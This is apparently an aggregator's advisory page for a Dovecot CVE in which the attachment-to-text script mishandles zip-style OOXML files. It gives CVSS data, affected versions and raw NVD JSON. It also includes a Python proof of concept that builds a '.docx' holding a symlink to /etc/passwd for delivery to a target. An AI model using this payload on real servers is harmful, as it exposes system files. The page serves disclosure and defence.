Security Vulnerability Report
CVE-2025-59031 CVSS 4.3 MEDIUM

CVE-2025-59031

Published: 2026-03-27 09:16:19
Last Modified: 2026-04-29 19:13:14

Description

Dovecot has provided a script to use for attachment-to-text conversion. This script unsafely handles zip-style attachments. An attacker can use specially crafted OOXML documents to cause unintended files on the system to be indexed and subsequently end up in FTS indexes. Do not use the provided script; instead, use something else like FTS tika. No publicly available exploits are known.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:* - VULNERABLE (versions before 2.4.3)
cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:* - VULNERABLE (versions before 2.3.22.1)
cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:* - VULNERABLE (versions from 3.0.0 up to, but excluding, 3.1.3)
Dovecot (versions using the default attachment-to-text conversion script)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# Proof of Concept for CVE-2025-59031
# This script creates a malicious OOXML-like ZIP file containing a symlink.
# When indexed by the vulnerable Dovecot script, it may index the target file.
import zipfile


def create_malicious_ooxml(output_filename, target_file):
    """
    Creates a ZIP file acting as a crafted OOXML document.
    It includes a symlink pointing to a sensitive system file.
    """
    try:
        with zipfile.ZipFile(output_filename, 'w', zipfile.ZIP_DEFLATED) as zf:
            # Create a symlink entry within the ZIP structure.
            # ZipInfo allows setting external attributes for file types.
            info = zipfile.ZipInfo(target_file.replace('/', '_'))
            # The high 16 bits of external_attr hold the Unix st_mode:
            # 0xA1ED == 0o120755 == S_IFLNK | 0755, i.e. a symlink.
            info.external_attr = 0xA1ED0000
            # The entry's content is the symlink target path.
            zf.writestr(info, target_file)
        print(f"[+] Malicious file created: {output_filename}")
        print(f"[+] It contains a symlink pointing to: {target_file}")
        print(f"[+] Send this file to a target using the vulnerable Dovecot script.")
    except Exception as e:
        print(f"[-] Error creating file: {e}")


if __name__ == "__main__":
    # Example: Targeting /etc/passwd
    OUTPUT_FILE = "malicious_doc.docx"
    TARGET_SYSTEM_FILE = "/etc/passwd"
    create_malicious_ooxml(OUTPUT_FILE, TARGET_SYSTEM_FILE)

References

https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json (Vendor Advisory)

Weakness: CWE-200
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59031", "sourceIdentifier": "[email protected]", "published": "2026-03-27T09:16:18.783", "lastModified": "2026-04-29T19:13:14.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dovecot has provided a script to use for attachment to text conversion. This script unsafely handles zip-style attachments. Attacker can use specially crafted OOXML documents to cause unintended files on the system to be indexed and subsequently ending up in FTS indexes. Do not use the provided script, instead, use something else like FTS tika. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.3", "matchCriteriaId": "BE209329-C5EA-4EE7-A23E-CD2EC061A9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*", "versionEndExcluding": "2.3.22.1", "matchCriteriaId": "5CF82590-D98A-4E06-AC8C-6CC3506ED923"}, {"vulnerable": true, "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.1.3", "matchCriteriaId": "F1137EFF-7493-4E1C-842A-FD0AF16B59DE"}]}]}], "references": [{"url": 
"https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}